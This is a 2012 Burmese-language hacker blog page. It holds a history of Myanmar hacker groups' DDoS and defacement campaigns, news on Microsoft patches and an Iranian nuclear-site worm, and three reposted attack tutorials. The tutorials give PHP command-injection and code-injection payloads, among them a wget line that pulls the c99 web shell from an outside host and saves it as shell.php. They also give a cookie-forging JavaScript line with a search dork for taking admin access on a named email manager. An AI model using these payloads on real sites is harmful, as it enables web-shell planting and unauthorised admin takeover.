Tuesday, July 31, 2012

Myanmar Hacker Evolution



Myanmar Hacker ဆိုတာနဲ႕ပတ္သတ္ရင္ ေတာ္ေတာ္မ်ားမ်ားက Blink Hacker Group ကိုပဲ ေျပးျမင္ၾကတယ္ ဟုတ္ပါတယ္ Blink Hacker Group ကို ဘယ္လိုပဲ ျမင္ျမင္သူတို႕ရဲ႕လုပ္ရပ္ေတြ ဟာ ဘာေတြပဲျဖစ္ျဖစ္ သူတို႕ဟာ Myanmar Hacker Evolution ( ျမန္မာ ဟက္ကာ အံုၾကြမႈ ) အေပၚ အေတာ္ၾကီးမားတဲ့ သက္ေရာက္မႈ ရွိခဲ့တယ္ဆိုတာပဲ.။
တကယ္ေတာ့ BHG မေပၚခင္ကတည္းက ျမန္မာ ဟက္ကာေတြရွိခဲ့တာပဲ ။ Planet Creator တို႕ YEHG ( YGN Ethical Hacker Group ) တုိ႕ လို Hacker Group ေတြလည္း ရွိခဲ့တာပဲ ။


  ျပီးေတာ့ YEHG ကို DDos တုိက္လို႕ ျပႆနာေတြ တက္ကုန္တာမ်ိဳးလို Hacker တိုက္ပြဲေတြလည္း ရွိခဲ့ဖူးတာပဲ ။ MMSO လို Hacker          Forum သီးသန္႕ မဟုတ္ေသာ္လည္း Hacking & Security Forum ေတြရွိခဲ့တာပဲ ။ မဇၩိမ ကို DDos တုိက္ခဲ့ျပီး Cyber War အသြင္ လုပ္တာလည္း ရွိခဲ့ဖူးတာပဲ ။ ဒီအထိ Hacker Evolution ( ဟက္ကာ အံုၾကြမႈ ) ဆိုတာမ်ိဳးျဖစ္မလာေသးဘူး ။
၂၀၁၂ Anonymous , Wikileaks , lulz တို႕ေက်းဇူးနဲ႕ ကမၻာလံုးဆုိင္ရာ Hacker အံုၾကြမႈၾကီးက ျမန္မာႏုိင္ငံကို ရိုက္ခတ္လာတယ္လို႕ပဲ ေျပာရမလား . ?? Blink Hacker Grop ဆိုျပီး အဖြဲ႕အစည္း တစ္ခု ေပၚလာတယ္ ။ စလာတုန္းကေတာ့ စစ္အစိုးရနဲ႕ပတ္သတ္တဲ့ မီဒီယာ ေတြကို တိုက္ခုိက္မယ္ဆိုတဲ့ အေၾကာင္းျပခ်က္နဲ႕ ေခတ္လူငယ္ Website ကို စတင္ တိုက္ခိုက္ခဲ့တယ္ ။ YTP ကို DDos နဲ႕ တိုက္ခုိက္တယ္လို႕ ေၾကညာခဲ့တယ္ ။ ဒီမွာပဲ နည္းပညာသမားေတာ္ေတာ္မ်ားမ်ားအျပင္ ႏိုင္ငံေရးသမားေတြ အျခား နည္းပညာ နယ္က မဟုတ္တဲ့လူေတြရဲ႕ အာရံုစိုက္မႈကို ရရွိခဲ့တယ္ ။ နည္းပညာနယ္ပယ္ရဲ႕ အျပင္ဘက္က လူေတြရဲ႕ ဦးေႏွာက္ထဲမွာ ျမန္မာဟက္ကာ ဆိုတဲ့ အေတြးအေခၚတစ္ခုကို ထည့္ေပးခဲ့တယ္ ။
BHG စတင္တည္ေထာင္ျပီး 1st Generation အဆံုးသတ္ခါနီးမွာ Myanmar Hacker Forum တစ္ခု တည္ေထာင္ဖို႕ၾကိဳးစားၾကတယ္ ။ ဒါေပမယ့္ အေၾကာင္းအမ်ိဳးမ်ိဳးေၾကာင့္  အဲ့ဒီ့ဖိုရမ္ ျပီးဆံုးမသြားဘူး ။ ဒီေတာ့ ပထမဆံုး ျမန္မာ ဟက္ကာ ဖိုရမ္ကို  ေျပာဆုိရင္ အဲ့ဒီ့ ဖုိရမ္ကို ျပရလိမ့္မယ္ ။ ေအာင္ျမင္တာ မေအာင္ျမင္တာ က  တစ္ေၾကာင္းေပါ့ ။




BHG 1st Generation က Myanmar Website ေတြကို စတင္တိုက္ခိုက္ေနတဲ့အခ်ိန္မွာပဲ Myanmar Hacker University ဆုိျပီး wall.fm အေျခစိုက္ ဆုိဒ္တစ္ခု ထြက္လာပါတယ္ ။ BHG ထက္စာရင္ သူတုိ႕က ပိုျပီး Open ျဖစ္ပါတယ္ ။ သို႕ေသာ္လည္း  ပညာအဆင့္အတန္းမွာေတာ့ နိမ့္က်ပါေသးတယ္ ။ အားရစရာေကာငး္တာတစ္ခုကေတာ့  စည္းလံုးမႈပါပဲ ။ သူတုိ႕ အလြန္စည္းလံုးပါတယ္ ။ ကၽြန္ေတာ့္အျမင္မွာ  ရိုင္းပင္းတယ္ လို႕ ျမင္တယ္ ။ ေနာက္ပိုင္း သူတို႕ Myanmar Hacker Forums ဆိုျပီ Hack Forums တစ္ခု တည္ေထာင္လိုက္ပါတယ္ ။ ပထမဆံုး မဟုတ္ေသာ္လည္း Active အျဖစ္ဆံုး အၾကီးမားဆံုး ဖုိရမ္လို႕ ေျပာရပါလိမ့္မယ္ ။

ဒီလိုနဲ႕ BHG 1st Generation ပ်က္စီးသြားပါတယ္ ။ သူတို႕ အဖြဲ႕ဖ်က္ေၾကာင္း ေၾကညာျပီး မၾကာခင္မွာပဲ  Myanmar Cyber Army ဆိုတာ ေပၚလာျပီး Myanmar Website ေတြကို တိုက္ခုိက္ျပန္တယ္ ။ ဒါ နည္းနည္းေတာ့ တိုက္ဆိုင္မႈက ၾကီးမားသလို  ခံစားရပါတယ္ :-P





သိပ္မၾကာပါဘူး Blink Hacker Group ကပဲ 2nd Generation အျဖစ္ လံုျခံဳေရးအရ အားနည္းေသာ မည္သည့္ Website ကိုမဆို တိုက္ခိုက္မယ္ဆိုျပီး ျပန္လည္ ထြက္ရွိလာပါတယ္ ။ ဒီအခ်ိန္ Myanmar Hacker Uniteam ဟာ လူသိမ်ားျခင္းမရွိေသးပါဘူး ။ ဒီအခ်ိန္မွာ Operation BD ဆိုတဲ့ Operation တစ္ခု Myanmar Uniteam က စတင္ခဲ့ပါတယ္ ။ Myanmar Hacker Uniteam က လူေတြ BD Website ေတြကို တိုက္ခိုက္ေနခ်ိန္မွာ BHG ဟာ Myanmar Website တစ္ခုကို တိုက္ခုိက္ျပီး BD Hacker ေတြကို Greetz လုပ္ခဲ့လို႕ အညိဳျငင္ခံခဲ့ရပါေသးတယ္ ။
ရိုဟင္ဂ်ာကိစၥမွာေတာ့ Myanmar Hacker Uniteam , BHG အပါအ၀င္ ျမန္မာဟက္ကာအေရးလႈပ္ရွားသူေတာ္ေတာ္မ်ားမ်ား စုစည္းမိလာပါတယ္ ။  ဘဂၤလားေဒ့ရွ္ Website ေတြကို တိုက္ခိုက္ရင္း ဆႏၵျပဳၾကပါတယ္ ။ အျခား နည္းပညာသမားေတြအျပင္  နည္းပညာအျပင္ဘက္ကလူေတြပါ Hacking နဲ႕ပတ္သတ္တဲ့ Information ေတြ Source ေတြကို ျမန္မာလိုေသာ္လည္းေကာင္း မွ်ေ၀ျခင္းမ်ားျဖင့္  လြယ္လြယ္ကူကူရရွိလာပါတယ္ ။ ဥပမာ DDos လိုဟာမ်ိဳးေပါ့ အတိအက် အေသအခ်ာေတြမသိေသာ္လည္း DDos ကို ျခံဳသိလာတယ္ DDos Tool ေတြအေၾကာင္းသိလာတယ္ ။ Myanmar Cyber Army ဆိုတဲ့ ေခါင္းစဥ္ေအာက္မွာ Hacktivist ေတာ္ေတာ္မ်ားမ်ား စု၀င္လာတယ္ ။
ဒီေတာ့ ျခံဳၾကည့္ရင္ BHG ဟာ နည္းပညာ သမားေတြအပါအ၀င္ နည္းပညာနယ္ပယ္အျပင္ဘက္ကလူေတာ္ေတာ္မ်ားမ်ားရဲ႕ ေခါင္းထဲကို ျမန္မာဟက္ကာဆိုတဲ့ စကားလံုးရိုက္သြင္းေပးႏုိင္ခဲ့ျပီး MM Hack Forums ကေတာ့ ပညာေတြမွ်ေ၀တဲ့ေနရာမွာ အဓိကက်လာပါတယ္ :)

copy from Ghostarea.net


Read More ->>

Microsoft to patch three critical vulnerabilities on Tuesday




ျပီးခဲ့တဲ့ တစ္ပတ္ အဂၤါေန႕ က Microsoft Security TechCenter ထိပ္တန္းအဆင့္ ရိွ vulnerabilities (ယိုေပါက္မ်ား၊အားနည္းခ်က္ေနရာမ်ား) ကိုတရား၀င္ ေက်ညာခ်က္ထုတ္ျပန္ ခဲ့ပါတယ္..ထိုသို႕ေက်ညာခ်က္ထုတ္ျပန္ရာတြင္..အထူးအေရးၾကီးေသာထိပ္ထန္းအဆင့္ယိုေပါက္ မ်ားအျပင္…ေနာက္ထပ္အေရးၾကီးေသာ အားနည္းခ်က္ယိုေပါက္ (၆) ခုကိုလဲတစ္ခါထဲ ထုတ္ျပန္ေက်ညာခ်က္ေပးခဲ့ပါတယ္…။ထိုသို႕ထုတ္ျပန္ရာတြင္ အားနည္းခ်က္ (၉) ခုစလံုးကိုတစ္ခါတည္းေဖာ္ျပထားျပီးေတာ့ ..အဲဒီ ထဲ က(၃)ခုဟာ…Critical အဆင့္ရိွေၾကာင္းႏွင့္ က်န္(၆) ခုမွာ Important အဆင့္ျဖစ္ေၾကာင္း တရာ၀င္ေၾကညာ စာတမ္း ထုတ္ျပန္ခဲ့တာျဖစ္ပါတယ္…။

ထိုကဲ့သို႕ (Critical) အဆင့္ရိွ အထူးအေရးၾကီးေသာအားနည္းခ်က္ ယိုေပါက္(၃) ခုထဲတြင္ စိတ္၀င္စားစရာအေကာင္းဆံုးအခ်က္မွာ..ထိုယိုေပါက္အားနည္းခ်က္(၃) တစ္ခုေသာယိုေပါက္ ဟာ Explorer 9 တြင္ပါ၀င္ေနျခင္းျဖစ္ပါတယ္…။ဒိထက္ပိုျပီးစိတ္၀င္စားစရာေကာင္းတာတစ္ခ်က္က ဒီအားနည္းခ်က္ယိုေပါက္ဟာ  Microsoft ထုတ္ကုန္ Browser ေတြထဲက အရင္ တုန္းက ထုတ္လုပ္ခဲ့တဲ့ version ေတြထဲမွာမရိွခဲ့ဘူးဆိုတာပါပဲ..။ဒီယိုေပါက္ဟာ ခုမွေရႊထီးေဆာင္းျပီးေရာက္လာတဲ့အတြက္ နည္းနည္းေတာ့ ေမးခြန္း ထုတ္ခ်င္ စရာေတာ့ေကာင္းပါတယ္…။

ေနာက္ထပ္ (Critical) အဆင့္ရိွအားနည္းခ်က္ယိုေပါက္ ႏွစ္ခုကေတာ့ အရမ္း အႏၱရာယ္မ်ားတဲ့ malicious user ေတြကို Windows operating systems ထဲကို execute code မ်ားကို ထည့္သြင္း ၀င္ေရာက္ခြင့္ျပဳျပီးေတာ့ ထိန္းခ်ဳပ္ခြင့္ ျပဳေစျခင္းျဖစ္တယ္လို႕ အဲဒီ ထုတ္ျပန္ေက်ညာ စာတမ္းမွာေဖာ္ျပထားပါတယ္…။အဲဒီယိုေပါက္ေတြဟာ Window OS မွာ server ( ထိန္ခ်ဳပ္သူ)   ႏွင့္ client ( ထိန္ခ်ဳပ္ခံရျခင္း/သူ) တို႕ကို ပါ support ျပဳလုပ္ေပးထားပါတယ္…။

အမ်ားေမွ်ာ္လင့္ထားတဲ့အတိုင္း ယခုအခ်ိန္မွာျပင္းထန္ယိုေပါက္တစ္ခုျဖစ္လာတဲ့ Microsoft XML Core Services မွ အားနည္းခ်က္ ယိုေပါက္ဟာ CVE-2012-1889 ( CVE =Common Vulnerabilities and Exposures ) ,( CVE-2012-1889 ဆိုတာ CVE ID တစ္ခုျဖစ္) မွာထင္ေပၚလာကာ ျပဳျပင္ ဖာေထးရမယ့္အခ်က္ တစ္ခ်က္ျဖစ္လာ ျပီလို႕ “Vulnerability Management and Penetration Testing service တစ္ခုျဖစ္ေသာ Rapid7 မွသုေတသနျပဳလုပ္သူတစ္ေယာက္ျဖစ္တဲ့ Marcus Carey ကထုတ္ေဖာ္ေျပာၾကားခဲ့ပါတယ္…။

ျပည့္ စံုစြာေလ့လာခ်င္သူမ်ားအတြက္ အခ်က္အလက္အျပည့္အစံုကို Microsoft ရဲ႕ တရား၀င္ security  ပိုင္းဆိုင္ရာထုတ္ျပန္ခ်က္မ်ားကို အပတ္စဥ္ အဂၤါေန႕တိုင္းသြားေရာက္ ေလ့လာႏိုင္ပါတယ္…။
Go Here

posted by Me
You also see in ghostarea.net
ref: thehackernew
Read More ->>

Iranian nuclear program hit by AC/DC virus



အီရန္မွာရိွတဲ့ Nuclear Program ေတြထိန္းခ်ဳပ္လုပ္ကိုင္ေနလွ်က္ရိွေသာ computer systems သည္ ထူးဆန္းစြာ တိုက္ခိုက္ခံခဲ့ရေၾကာင္း…သတင္းတစ္ရပ္ကဆိုခဲ့ပါတယ္..။တိုက္ ခိုက္ေသာ virus မွာ AC/DC virus လို႕ အမည္းေပးထားျပီး worm အမ်ိဳးအစားျဖစ္ပါတယ္..။ထိုသို႕တိုက္ခိုက္ခံရျခင္းသည္..ၾကိဳတင္သတင္း အခ်က္အလက္ရရိွခဲ့ျပီးမွ ေပါ့ေလ်ာ့မႈ ေၾကာင့္ ျဖစ္ပြားခဲ့ေၾကာင္းလဲသိရိွရပါသည္.။


သတင္းအခ်က္အလက္အျပည့္အစံုမွာ…


အီရန္ႏိုင္ငံ ရိွ Nuclear ဆိုင္ရာအဖဲြ႕အစည္းတစ္ခုျဖစ္ေသာ Atomic Energy Organisation ၏ scientist တစ္ေယာက္၏ေျပာၾကားခ်က္အရ computer systems ေတြဟာ cyber-attack ျပဳလုပ္ခံခဲ့ရတယ္ လို႕ ဖြင့္ခ်ေျပာၾကားခဲ့ပါတယ္..။ထိုသို႕ တိုက္ခိုက္ရာတြင္နာမည္ၾကီး AC/DC အဖြဲ႕ ၏ Thunderstruck သီခ်င္းသည္..မယံုၾကည္ႏိုင္ေလာက္ေအာင္ ညသန္းေခါင္ယံ အခ်ိန္တြင္ full volume အျပည့္ျဖင့္ play လုပ္ခဲ့ပါတယ္….။အဲဒီလိုထူးထူး ျခားျခားတိုက္ခိုက္ခံရျခင္းသည္..Stuxnet ဗိုင္းရပ္နဲ႕ တိုက္ခိုက္ခံရ ခဲ့ျပီးေနာက္ပိုင္း..အထူး ျခားဆံုးျဖစ္ရပ္ လဲျဖစ္ပါတယ္..။
ထိုတိုက္ခိုက္မႈဟာ သုေတသနျပဳသူတစ္ေယာက္ဆီကို Iran’s atomic energy organisation မွ လံုျခံဳေရးျမင့္မားေသာ လိႈ႕၀ွက္ email တစ္ေစာင္ေပးပို႕ သတိေပးျခင္း အျပီးတြင္ထူးဆန္းစြာျဖင့္တိုက္ခိုက္သြာျခင္းလဲျဖစ္ပါတယ္…။ထိုကဲ့သို႕ သတိေပးမႈေပးပို႕ျပီးေတာ့မွ တိုက္ခိုက္ျခင္ခံခဲ့ရမႈအတြက္ အနည္းငယ္မွ်ေမးခြန္းထုတ္ ဖြယ္ရိွဖြယ္ရိွပါတယ္…။ ထို သတိေပးပို႕ မႈ email တစ္စိတ္တစ္ပိုင္းကိုေဖာ္ျပရလွ်င္ ေအာက္ပါအတိုင္းျဖစ္ပါတယ္..။

“ကၽြန္ေတာ္ဟာ…ကၽြန္ေတာ္တို႕ရဲ႕ nuclear program လံုျခဳံေရးနဲ႕ပက္သက္ျပီးေတာ့ သတင္းအခ်က္အလက္တစ္ခုကို ေရးသာေပးပို႕လိုက္ရပါတယ္ .ကၽြန္ေတာ္တို႕ ရဲ႕ nuclear program ေနာက္ထပ္တစ္ၾကီမ္ တိုက္ခိုက္ဖို႕ ျပင္ဆင္ေနလွ်က္ရိွၾကျပီးေတာ့ အဲဒီတိုက္ခိုက္မႈအတြင္းမွာ worm အသစ္ ျဖင့္ တိုက္ခိုက္သြားမွာျဖစ္ပါတယ္..။ အဆိုပါ ဗိုင္းရပ္အသစ္သည္ ယိုေပါက္မ်ားကိုရွာေဖြျပီးေတာ့ ကၽြန္ေတာ္တို႕ရဲ႕ Natanz ျမိဳ႕က Nuclear စက္ရံုအျပင္ Qom ျမိဳ႕အနီးက Fordo ေထာက္ပံေရးစက္ရံုက automation network ကို shut down ျပဳလုပ္တိုက္ခိုက္သြားမွာျဖစ္ပါတယ္..”

လို႕စာေရးသားေပးပို႕ခဲ့ပါတယ္…။

အဲဒီ email ထဲမွာပဲ ” ဒီဗိုင္းရပ္ဟာထူးျခားစြာ သီးခ်င္းတစ္ပုဒ္ကို ဖြင့္လိမ့္မယ္” လို႕ လဲေျပာၾကားခဲ့ျပီးေတာ့ အဲဒီလိုတိုက္ခိုက္ခံရမယ္ဆိုရင္လဲ Attacker ေတြဟာ သူတို႕ ေႏွာက္ယွက္ ၀င္ေရာက္တိုက္ခိုက္ေန မႈကို Thunderstruck သီခ်င္းနဲ႕ ထုတ္ေဖာ္ေၾကညာလိမ့္မည္ျဖစ္ေၾကာင္းကို လဲ ထို email ထဲတြင္အျပည့္အစံုေရးသားေဖာ္ျပခဲ့ပါတယ္…။ထိုသို႕  တိုက္ခိုက္မႈဟာ တတိယ အၾကမ္းေျမာက္ျဖစ္ျပီးေတာ့ Iran ႏိုင္ငံရဲ႕ အညင္းပြားေနတဲ့ Nuclear ဆိုင္ရာ ျပသနာေတြ အတြက္ တိုက္ခိုက္မႈျဖစ္ေၾကာင္းလဲေျပာၾကားသြားခဲ့ပါတယ္…။

ထိုတိုက္ခိုက္မႈတြင့္ ဖြင့္ခဲ့ေသာသီခ်င္းဟာ Atomic Energy Organization of Iran (AEOI) ရဲ႕ မူ၀ါဒ ဆိုင္ရာ ကိုတိုက္မႈရံႈ ခ်မႈျဖစ္ပါတယ္…။ယခု တိုက္ခိုက္မႈဟာလဲ 2010 ခုႏွစ္ Stuxnet ဗိုင္းရပ္ တိုက္ခိုက္မႈအျပီး အလားတူ ပံုစံ အတိုင္းတိုက္ခိုက္ခံရတာျဖစ္ပါတယ္…။ဒီတိုက္ခိုက္မႈအတြက္ မည္သည့္အဖြဲ႕ အစည္းကမွ မိမိ တို႕လက္ခ်က္ပါလို႕ ၀န္ခံျခင္း ၊ ထုတ္ေဖာ္ေျပာဆိုျခင္းမရိွေသးပါဘူး…။

နည္းပညာရွင္ေတြကေတာ့ ယခုတိုက္ခိုက္ လာတဲ့ ဗိုင္းရပ္ဟာ ရိုရွင္းျပီးေတာ့ ေစ်းေပါေပါ open-source project တစ္ခုကိုေက်ာ္ျဖတ္ ၀င္ေရာက္လာ ျပီးေတာ့ ထိုဗိုင္ရပ္ဟာ software အတြင္းမွာရိွတဲ့ ယိုေပါက္ေတြကိုရွာ ေဖြခဲ့ျခင္းျဖစ္ေၾကာင္းကိုလဲ ၀န္ခံခဲ့ၾကပါတယ္…။

ဒီတိုက္ခိုက္မႈ အတြက္ ၾကိဳတင္ျပီးေတာ့ အသိေပးေျပာၾကားခဲ့ေသာ email အျပည့္အစံုမူရင္းမွာေအာက္ပါအတိုင္းျဖစ္ပါသည္..။
“I am writing you to inform you that our nuclear program has once again been compromised and attacked by a new worm with exploits which have shut down our automation network at Natanz and another facility Fordo near Qom.

According to the email our cyber experts sent to our teams, they believe a hacker tool Metasploit was used. The hackers had access to our VPN. The automation network and Siemens hardware were attacked and shut down. I only know very little about these cyber issues as I am scientist not a computer expert.

There was also some music playing randomly on several of the workstations during the middle of the night with the volume maxed out. I believe it was playing ‘Thunderstruck’ by AC/DC.”
 
posted by me
You also see in ghostarea.net 
ref: thehackernew
Read More ->>

Remote Command Execution



Remote Command Execution ကိုလည္း Remote Code Execution လုိပဲ RCE လို႕ေခၚၾကပါတယ္ အေခၚအေ၀ၚဆင္သလို Attack လုပ္ပံုလည္း ဆင္တူပါတယ္ ။ Remote Command Execution ဆိုေတာ့အတိုင္း Remote Command ေတြ Execute လုပ္ခြင့္ေပးတာကို ဆိုလိုတာပါ ။

Code


<?php
$cmd=$_GET['cmd'];
system($cmd);
?>

ဒီလိုသာျဖစ္ေနရင္ ကၽြန္ေတာ္တို႕ www.site.com/index.php?cmd=whoami ဆိုျပီး whoami command ေပးရင္ Server User Name တက္လာပါလိမ့္မယ္ ။ အဲ့ဒီလိုပဲ Command Execute လုပ္ႏုိင္တဲ့ အျခားေသာ PHP Function ေတြလည္းရွိပါေသးတယ္ ။

အဲ့ဒါေတြကေတာ့

exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output

တို႕ျဖစ္ပါတယ္ ။

Command ေပးတဲ့ေနရာမွာ whoami လို Command မေပးပဲ wget http://www.sh3ll.org/c99.txt? -O shell.php လို We Get Command ေပးလိုက္ရင္ Shell ကိုယူျပီး .php အျဖစ္ Out Put FIle ထုတ္သြားမွာျဖစ္ပါတယ္ ။

www.site.com/index.php?cmd=wget http://www.sh3ll.org/c99.txt? -O shell.php

အမွန္အတိုင္းေျပာရရင္ အေပၚက Example Vuln က Theory ဆန္လြန္းပါတယ္ ။ တကယ့္လက္ေတြ႕မွာျဖစ္သြားတာေလးေတြၾကည့္လိုက္ရေအာင္ ။

Example 1 :

Code from dig.php


<?php
include("common.php");
showMenu();
echo '<br>';
$status = $_GET['status'];
$ns  = $_GET['ns'];
$host   = $_GET['host'];
$query_type   = $_GET['query_type']; // ANY, MX, A , etc.
$ip      = $_SERVER['REMOTE_ADDR'];
$self   = $_SERVER['PHP_SELF'];
$host = trim($host);
$host = strtolower($host);
echo("<span class=\"plainBlue\"><b>Executing : <u>dig @$ns $host $query_type</u></b><br>");
echo '<pre>';
//start digging in the namserver
system ("dig @$ns $host $query_type");
echo '</pre>';
} else {
?>

ကၽြန္ေတာ္တုိ႕စိတ္၀င္စားတာ အပိုင္းေလးတစ္ပုိင္းပါပဲ ။ Remote Command Execute လုပ္ခြင့္ရွိမယ့္ အပိုင္းေလးတစ္ပိုင္းပါ ။

$ns  = $_GET['ns'];
system ("dig @$ns $host $query_type");

အဲ့ဒီ့မွာ ns variable ဟာ Filer လုပ္ထားျခင္းမရွိပါ ။ ဒါေၾကာင့္ Attacker က ၾကည့္တဲ့ Command Execute လုပ္ခြင့္ရွိပါတယ္ ။
www.site.com/dig.php?ns=whoami&host=ghostarea.net&query_type=NS&status=digging
whoami ဆိုတဲ့ Command ကို Execute လုပ္ဖို႕ၾကိဳးစားေပသိ Execute ျဖစ္သြားမွာမဟုတ္ပါဘူး အေၾကာင္းရင္းကေတာ့ Code က ဒီလိုသြားမွာျဖစ္မွာမို႕လို႕ပါ ။

system ("dig whoami ghostarea.net NS");

ဒီလို  Command မရွိတဲ့အတြက္ အလုပ္လုပ္မွာမဟုတ္ပါဘူး ။ ဒီေတာ့ ကၽြန္ေတာ္တို႕  တမ်ိဳးစဥ္းစား၇ပါလိမ့္မယ္။ Terminal မွာ အသံုးျပဳခြင့္ရွိတဲ့ And Operator || ကို သံုးပါ့မယ္ ။

www.site.com/dig.php?ns=||whoami||&host=ghostarea.net&query_type=NS&status=digging

ဒါဆုိရင္ code က ဒီလိုျဖစ္သြားပါ့မယ္

system ("dig ||whoami|| ghostarea.net NS");

ဒီလိုဆိုမွ dig နဲ႕ ghostarea.net NS ၾကားမွာျခားျပီး Command အျဖစ္ Execute လုပ္သြားမွာျဖစ္ပါတယ္ ။

posted by negative thunder
copy from mhf
Read More ->>

Remote Code Execution



Remote Code Execution ဆိုတာ RCE လို႕ အတိုေကာက္ေခၚၾကတဲ့ အေတြ႕ရမ်ားတဲ့ Web Vuln ေတြထဲက တစ္ခုျဖစ္ပါတယ္ ။
ထံုးစံအတုိင္း ဘယ္လိုေတြ ေပါက္လဲ ဘယ္လို ေနရာေတြမွာေပါက္သြားလဲ တစ္ခ်က္ၾကည့္ရေအာင္ ။
How Vulnerability comes?

Code


[color=#00ff00][size=1][font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]<?php[/font]
[font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]$code=$_GET['code'];[/font]
vuln[font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]($code);[/font]
[font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]?>[/font][/size][/color]

Code ထဲက vuln ဆိုတဲ့ Function ဟာ string ကို PHP Code အျဖစ္နဲ႕ ေျပာင္းလဲေပးသြားမွာျဖစ္ျပီး အဲ့ဒါေၾကာင့္ ကၽြန္ေတာ္တုိ႕ဟာ Code ေတြကို Execute လုပ္ခြင့္ရွိမွာ ျဖစ္ပါတယ္
တကယ္ေတာ့ ဒီဟာက သီအိုရီဆန္လြန္းပါတယ္ လက္ေတြ႕မွာျဖစ္တတ္တဲ့ အေၾကာင္းအရာေလးေတြ ၾကည့္ရေအာင္

Type 1 :

Blog တစ္ခုထံုးစံအတုိင္း Comment ေပးတဲ့ေနရာ ရွိမယ္ ။
Comment Form ဆိုတဲ့အတိုင္း Submit Form နဲ႕ Comment.php ကို ခ်ိတ္ထားမယ္ေပါ့ ။ submit.php နဲ႕ comment.php ဆိုပါစို႕
Submit.php ကိုၾကည့္ရေအာင္

submit.php

Code:

[color=#00ff00][font=Times New Roman,serif][size=3]<[/size][/font][font=Times New Roman,serif][size=3]form method="POST" action="">[/size][/font]
[font=Times New Roman,serif][size=3]<textarea rows="10" name="comments" cols="60"></textarea>
<p><input type="submit" value="Post" name="sub"></p>
</form>[/size][/font][/color]

Comment.php ကိုၾကည့္ရေအာင္

comments.php

Code:

<?php
[color=#00ff00][font=Times New Roman,serif][size=3]$comments = $_POST['comments'];
$log = fopen('comments.php','a');
fwrite($log,'<br />'.'<br />.'<center>'.'Comments::'.'<br />'.$comments);
fclose($log);
?>[/size][/font][/color]

ဒီလိုဆိုရင္ submit form က သြင္းသမွ်ကို Comment.php မွာ သြားျပီး သက္ေရာက္ေနမွာျဖစ္ပါတယ္ ။ ဒါေၾကာင့္ Malicious Code ကို Inject လုပ္လုိက္ရင္ ျဖစ္လာမယ့္ အက်ိဳးဆက္က ????
အခုေျပာသြားတာက Post Method ကေန ေပါက္သြားတဲ့အေၾကာင္း Get Method ဆိုရင္ေရာ...

Type 2 :

Code:

 [color=#00ff00][font=Times New Roman,serif][size=3]<?php
$msg = $_GET['msg'];
$ip = getenv('REMOTE_ADDR');
$error = fopen('errorlog.php','a');
fwrite($error,'<br />'.$msg.'<br />'.$ip.'<br />');
fclose($error);
?>[/size][/font][/color]

ဒီလိုေနရာမွာဆိုရင္ RCE သာမကဘူး XSS လိုဟာမ်ိဳးပါ Inject လုပ္ႏုိင္ပါမယ္ ။
အိုေခ ဒါဆို Attacker ဘယ္လို Attack လုပ္သြားတယ္ဆုိတာကို ဆက္ရေအာင္ ။

How they Attack?

Attacker က ခုနက Type 2 လို Get Method မွာ RCE ေပါက္ေနတာကို ေတြ႕ျပီဆိုပါစို႕ ဒါဆို String တစ္ေၾကာင္း ေခၚျပီး Attack လုပ္ပါမယ္ တျခားေနရာက Shell ကို ေခၚယူခိုင္းလိုက္တာမ်ိဳးေပါ့

www.site.com/vuln.php?hack=1 ဆိုပါစို႕
အဲ့လိုေနရာမွာ
www.site.com/vuln.php?hack=<?system(‘wget http://www.sh3ll.org/c99.txt? -O shell.php’);?>

ေနာက္က <?system(‘wget http://www.sh3ll.org/c99.txt? -O shell.php’);?> ဆိုတာကို နည္းနည္းေျပာဖို႕ လိုမယ္ထင္ပါတယ္

wget ဆိုတာ we get ပါ တျခားေနရာက ယူမယ္ေပါ့ ဘာကို ယူမလ www.sh3ll.org/c99.txt ကို ယူမယ္
-O ဆိုတာ Out put အျဖစ္ထြက္ပါေပါ့ ဘယ္လို ထြက္ရမလဲ c99.txt ဆိုတဲ့ text file ကုိ shell.php ဆုိတဲ့ PHP File အျဖစ္ ထုတ္ပါလုိ႕ ေျပာလိုက္တာပါ .. ဒါဆို ဘာဆက္လုပ္မလ ဆိုတာ သိေလာက္ပါျပီ ;-)

Countermeasures

အကယ္၍မ်ား ; ကို ကန္႕သတ္လိုက္မယ္ဆိုရင္ PHP Code ေတြအလုပ္လုပ္ေတာ့မွာမဟုတ္ပါဘူး 
 
post by negative thunder
copy from MHF
Read More ->>

Insecure Cookie Handling



Web Server ေတြရဲ႕ Cookie Handle အလြဲကေန admin access ရယူသြားတဲ့ Vuln ျဖစ္ပါတယ္။
ဥပမာ vuln.php ရဲ႕ Code ကို တစ္ခ်က္ၾကည့္လိုက္ပါ ။

Code


if($_POST['password'] == $thepass) {
setcookie("is_user_logged","1");
} else { die("Login failed!"); }
............ etc .................
if($_COOKIE['is_user_logged']=="1")
{ include "admin.php"; else { die('not logged'); }

သူ႕မွာ  လြဲသြားတဲ့အေၾကာင္းအရာက "is_user_logged" ဆိုတဲ့ Variable ျဖစ္ပါတယ္ Browser ထဲက Cookie ရွိရင္ Vale 1 အျဖစ္သတ္မွတ္ျပီး Log in အ၀င္ခံလိုက္တဲ့ သေဘာပါ အဲ့ဒီ့မွာပဲ

javascript:document.cookie = "is_user_logged=1; path=/";

ဆိုျပီး Javascript Inject လုပ္လိုက္ရံုနဲ႕ Log in ၀င္ျပီးသားျဖစ္သြားပါ့မယ္ ။

Online Email Manager မွာ ေပါက္သြားတဲ့ Vuln အေၾကာင္းၾကည့္လုိက္ရင္ ပိုျပီး သေဘာေပါက္သြားမွာပါ ။

DorK : Powered by Online Email Manager

အဲ့ဒီ့မွာ http://www.site.com/demo/OEM/admin/index.php ဆိုပါစို႕ အဲ့ဒီ့မွာ

javascript:document.cookie = "auth=admin; path=/"; လို႕ Javascript Inject လုပ္လိုက္ျပီး emailList.php ( http://www.site.com/demo/OEM/admin/emailList.php )


ကိုသြားလိုက္ရံုနဲ႕  Admin အျဖစ္ Login ၀င္ေနျပီးသားျဖစ္တာ ေတြ႕မွာပါ

Ref : SirGod
post by negative thunder
copy from MHF
Read More ->>

Friday, July 27, 2012

Phone Phreaking







